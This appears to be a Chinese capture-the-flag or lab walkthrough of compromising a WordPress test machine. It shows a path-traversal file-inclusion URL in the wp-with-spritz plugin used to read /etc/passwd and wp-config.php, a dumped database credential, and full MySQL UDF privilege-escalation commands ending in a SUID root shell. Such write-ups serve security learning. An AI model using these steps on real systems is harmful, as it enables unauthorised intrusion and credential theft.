kali:192.168.111.111
靶机:192.168.111.154
信息收集
端口扫描

访问web发现是wordpress

使用wpscan扫描,发现插件:wp-with-spritz

该插件存在存在文件包含漏洞
/usr/share/exploitdb/exploits/php/webapps/44544.php

漏洞利用
读取/etc/passwd文件
http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
使用hydra爆破ssh

进入网站根目录发现只能以www-data读取里面的文件

文件包含wordpress配置文件获得mysql账号密码 root:VjFSQ2IyRnNUak5pZWpCTENnPT0K
http://192.168.111.154/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/html/wordpress/wp-config.php
提权
mysql udf提权
使用scp命令上传lib_mysqludf_sys_64.so到目标的/tmp目录
scp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so carlos@192.168.111.154:/tmp登录MySQL数据库执行以下命令
#mysql必须要以root身份运行
ps -aux | grep mysql
#当secure_file_priv的值没有具体值时,表示不对 mysqld 的导入|导出做限制
show global variables like '%secure%';
#查看插件所在路径
show variables like '%plugin%';
#创建数据表a
create table a(line blob);
#往表a插入数据
insert into a values(load_file('/tmp/lib_mysqludf_sys_64.so'));
#插入二进制数据, 然后利用dumpfile函数把文件导出
select * from a into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
#创建自定义函数sys_exec 类型是integer,别名 soname 文件名
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
#调用自定义函数执行命令
select sys_exec('cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash');
#退出数据库执行命令
/tmp/bash -p获得flag

文章描述了一次针对WordPress网站的安全渗透测试过程,包括端口扫描、发现并利用wp-with-spritz插件的文件包含漏洞读取敏感信息,通过mysqludf进行提权,最终获取系统权限。

705

被折叠的 条评论
为什么被折叠?



